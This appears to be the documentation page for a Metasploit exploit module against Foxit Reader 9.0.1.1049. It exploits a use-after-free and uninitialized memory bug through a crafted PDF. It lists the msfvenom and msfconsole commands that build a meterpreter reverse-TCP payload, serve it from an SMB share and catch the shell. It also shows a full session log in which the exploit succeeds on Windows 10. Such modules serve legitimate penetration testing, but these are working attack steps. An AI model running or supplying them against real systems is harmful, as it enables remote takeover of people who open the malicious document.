## Description

Foxit Reader v9.0.1.1049 and earlier are affected by use-after-free and uninitialized memory vulnerabilities that can be used to gain code execution. This module uses Uint32Array uninitialized memory and text annotation use-after-free vulnerabilities to call WinExec with a share file path to download and execute the specified exe. The module has been tested against Foxit Reader v9.0.1.1049 running on Windows 7 x64 and Windows 10 Pro x64 Build 17134. Windows 10 Enterprise needs to have [insecure logons enabled](https://support.microsoft.com/en-ca/help/4046019) for the exploit to work as expected.

## Vulnerable Application

[Foxit Reader v9.0.1.1049](https://www.exploit-db.com/apps/1040d634123948886f664afc95ec0a5e-FoxitReader901_enu_Setup_Prom.exe) and earlier

## Verification Steps

1. `./msfvenom -p windows/meterpreter/reverse_tcp LHOST=<lhost> LPORT=<lport> --arch x86 -f exe /share/path/tmp.exe`
2. `chmod 777 /share/path/tmp.exe`
3. `./msfconsole -qx 'use exploit/windows/fileformat/foxit_reader_uaf ; set exename tmp.exe ; set share <share> ; set lhost <lhost> ; run`
4. `use multi/handler`
5. `set payload windows/meterpreter/reverse_tcp`
6. `set lhost <lhost>`
9. `run -j`
10. Copy pdf over to target. Start Foxit Reader then open pdf from Foxit's Menu.

Note: The target machine running Foxit Reader will need network access to the system hosting the exe.

## Scenarios

### Foxit Reader v9.0.1.1049 running on Windows 10 Pro x64 Build 17134

```
msfdev@simulator:~/git/metasploit-framework
$ ./msfvenom -p windows/meterpreter/reverse_tcp LHOST=172.22.222.197 LPORT=4444 --arch x86 -f exe -o /opt/malicious/tmp.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 341 bytes
Final size of exe file: 73802 bytes
Saved as: /opt/malicious/tmp.exe
msfdev@simulator:~/git/metasploit-framework
$ chmod 777 /opt/malicious/tmp.exe 
msfdev@simulator:~/git/metasploit-framework
$ ./msfconsole -qx 'use exploit/windows/fileformat/foxit_reader_uaf ; set exename tmp.exe ; set share tmp ; set lhost 172.22.222.197 ; run '
exename => tmp.exe
share => tmp
lhost => 172.22.222.197
[*] share_path: \\172.22.222.197\tmp\tmp.exe
[+] test.pdf stored at /home/msfdev/.msf4/local/test.pdf
msf5 exploit(windows/fileformat/foxit_reader_uaf) > use multi/handler
msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set lhost 172.22.222.197
lhost => 172.22.222.197
msf5 exploit(multi/handler) > set exitonsession false
exitonsession => false
msf5 exploit(multi/handler) > run -j
[*] Exploit running as background job 0.
[*] Started reverse TCP handler on 172.22.222.197:4444 
[*] Sending stage (179779 bytes) to 172.22.222.200
[*] Meterpreter session 1 opened (172.22.222.197:4444 -> 172.22.222.200:49673) at 2018-08-21 07:50:34 -0500

msf5 exploit(multi/handler) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > sysinfo
Computer        : DESKTOP
OS              : Windows 10 (Build 17134).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x86/windows
meterpreter > getuid
Server username: DESKTOP\msfdev
```
